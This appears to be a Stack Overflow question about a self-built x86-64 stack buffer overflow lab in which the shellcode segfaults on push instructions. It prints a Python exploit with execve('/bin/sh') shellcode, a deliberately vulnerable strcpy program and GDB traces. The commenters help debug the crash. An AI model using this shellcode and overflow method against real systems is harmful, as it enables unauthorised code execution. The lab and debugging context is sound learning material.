# Why does my shellcode crash on push instructions?

Tags: linux, assembly, x86-64, buffer-overflow, shellcode

I am trying to execute a basic stack based buffer overflow on Ubuntu 19.04.

The following overflow-countermeasures are currently disabled:

- ASLR (/proc/sys/kernel/randomize_va_space = 0)
- NX (Source compiled with -z execstack)
- Canaries (Source compiled with -fno-stack-protector)

The basic overflow works fine, after the **ret**, the rip jumps to the shellcode and executes the first instructions. However, as soon as a push instruction is executed, the program crashes (Segfault). Am I missing some active countermeasures or is there a fundamental flaw with my code?

I've used GDB to analyze the crash. However, when the vulnerable program crashes, GDB crashes as well.

Eploit code (exp.py):

```py
ret_addr = 0x7fffffffde90 - 0x100
scode = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05"

buf = scode  # Shelloce
buf += "\x41" * 242 # Padding
buf += conv(ret_addr) # Return Adress = Start address of buffer

print buf
```

vulnerable.c:

```
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
        char buf[256];
        strcpy(buf,argv[1]);
        printf("Message: %s\n",buf);
        return 0;
}
```

GDB analysis after ret in vulnerable.c:

```
0x7fffffffdd90  xor    esi,esi    <- rip
0x7fffffffdd92  push   rsi   
0x7fffffffdd93  movabs rbx,0x68732f2f6e69622f    
0x7fffffffdd9d  push   rbx   
0x7fffffffdd9e  push   rsp   
0x7fffffffdd9f  pop    rdi   
0x7fffffffdda0  imul   esi   
0x7fffffffdda2  mov    al,0x3b   
0x7fffffffdda4  syscall
```

So the instruction flow is successfully redirected to the shellcode. However, on the next instruction (push rsi), the program crashes with a Segfault (and so does gdb: [5]+ Stopped).

Comment: I've just tested it, compiling with -D_FORTIFY_SOURCE=0 doesn't solve the issue. Thank you anyway, wasn't aware of that option...

Comment: @jww: The 16-byte alignment requirement is part of the calling convention/ABI, *not* the ISA.  `push` itself doesn't care about alignment.  The x86 ISA doesn't have hardware support for a "shadow stack" either.  The only thing that would explain `push` faulting is RSP pointing to invalid or non-writeable memory, or the `push` instruction being in a non-executable page (unlikely if the instruction before didn't fault.)

Comment: Are you sure you used `si` (`stepi` by asm instruction) in GDB, not `step` (by source line)?  The GDB disassembly of your shellcode looks reasonable (if `0x3b` is the right system call), but check the register values before `syscall` runs.  It makes no sense that execution can't reach the `syscall`.

Comment: Thank you @Peter Cordes, I was using the nexti command in gdb which seemed to have caused the crash. When I use stepi, it works.

Comment: However, if I run the exploit without debugger, it still segfaults. Any idea why that is?

Comment: IDK; debug the core dump from the crash and find out.

Comment: I had a similar problem, which was answered by: https://stackoverflow.com/questions/43141239/shellcode-not-executed-properly